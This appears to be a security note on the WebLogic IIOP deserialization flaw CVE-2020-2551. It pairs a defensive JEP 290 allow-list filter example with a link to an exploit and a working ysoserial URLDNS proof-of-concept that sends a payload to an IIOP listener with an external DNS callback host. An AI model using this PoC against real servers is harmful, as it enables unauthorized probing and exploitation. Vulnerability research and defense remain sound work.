Everything I know about CVE-2020-2551

Positioning: it is a deserialization entry point; a single gadget is enough for RCE.

Affected versions: depends on the JDK (jdk7u21), Jython ( ), the underlying libraries (CommonsCollections) and the patch level. Other gadgets may also be exploitable.
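The two notes above say the IIOP entry point only becomes RCE when a gadget class (CommonsCollections, Jython, the jdk7u21 chain, or one not yet known) is reachable from the deserializer. The following is an added example, not code from the gist, showing the defender-side control that addresses exactly that dependency: a JEP 290 deserialization filter with an explicit allow-list, so any class outside the list, including gadgets nobody has catalogued yet, is refused before an instance is created. It assumes JDK 9 or later for `java.io.ObjectInputFilter`; the class names `Allowed` and `Unexpected` are constructed stand-ins for "a type the application expects" and "anything else".

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashMap;

// Added example (not from the gist): an allow-list deserialization filter.
// Requires JDK 9+ for java.io.ObjectInputFilter.
public class SerialFilterDemo {

    // JEP 290 pattern syntax: patterns are tried in order, "!" rejects,
    // ".*" matches every class in a package, a bare name matches exactly,
    // and "!*" rejects everything not admitted earlier. The two limits bound
    // object-graph depth and reference count to blunt resource-exhaustion streams.
    static final String ALLOW_LIST =
            "java.util.*;"
          + "java.lang.*;"
          + "SerialFilterDemo$Allowed;"
          + "!*;"
          + "maxdepth=32;maxrefs=10000";

    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(ALLOW_LIST);

    // A type the application expects to receive (constructed for this demo).
    static final class Allowed implements Serializable {
        private static final long serialVersionUID = 1L;
        final String name;
        Allowed(String name) { this.name = name; }
    }

    // Stand-in for any class the application never intended to deserialize;
    // a gadget class would fall into this category (constructed for this demo).
    static final class Unexpected implements Serializable {
        private static final long serialVersionUID = 1L;
        final int payload = 42;
    }

    static byte[] serialize(Serializable obj) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(obj);
        }
        return bos.toByteArray();
    }

    // Deserialize with the filter installed on this stream. The filter is consulted
    // for every class descriptor before an instance is created, so a rejected class
    // never has its readObject/readResolve invoked.
    static Object deserialize(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    // True if the filter rejected the stream (readObject throws InvalidClassException
    // with "filter status: REJECTED"), false if the object was admitted.
    static boolean isRejected(byte[] bytes) throws IOException, ClassNotFoundException {
        try {
            deserialize(bytes);
            return false;
        } catch (InvalidClassException rejected) {
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        HashMap<String, Integer> benign = new HashMap<>();
        benign.put("k", 1);

        // java.util.HashMap, java.lang.Integer and java.lang.Number are all admitted
        System.out.println("HashMap rejected?    " + isRejected(serialize(benign)));
        // exact-name match on SerialFilterDemo$Allowed
        System.out.println("Allowed rejected?    " + isRejected(serialize(new Allowed("ok"))));
        // SerialFilterDemo$Unexpected matches no allow pattern, so "!*" rejects it
        System.out.println("Unexpected rejected? " + isRejected(serialize(new Unexpected())));
    }
}
```

When the deserialization happens inside a container whose code you do not control, as with the WebLogic IIOP listener here, the same pattern can be applied process-wide with the `jdk.serialFilter` system property (`-Djdk.serialFilter=<pattern>`) instead of per stream. Treat it as a defense-in-depth layer on top of the vendor patch level the note above mentions, not a substitute for it: the filter only governs classes loaded through `ObjectInputStream`, and a list of known gadget packages would be weaker than the allow-list used here precisely because the note says other gadgets may exist.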

PoC:

Exploit for 10.3.6:

https://github.com/Y4er/CVE-2020-2551

PoC:

package com;

import javax.naming.Context;
import javax.naming.InitialContext;
import java.util.Hashtable;

import ysoserial.payloads.URLDNS;

class test {

    public static void main(String[] args) throws Exception {

        // ysoserial URLDNS payload: a HashMap whose URL key causes a DNS lookup of
        // the given host when the map is deserialized. It relies on JDK classes only,
        // so it confirms that the server deserializes the bound object without
        // needing any third-party gadget on the server's classpath.
        URLDNS u = new URLDNS();
        Object o = u.getObject("http://local.4inxs7g4bqg41civtrzp1axjpav0jp.burpcollaborator.net");

        // Point WebLogic's JNDI client at the IIOP listener.
        String rhost = "iiop://127.0.0.1:7001";
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
        env.put("java.naming.provider.url", rhost);
        Context context = new InitialContext(env);

        // rebind() sends the object to the server over IIOP, where it is deserialized.
        context.rebind("k4ii" + System.nanoTime(), o);
    }
}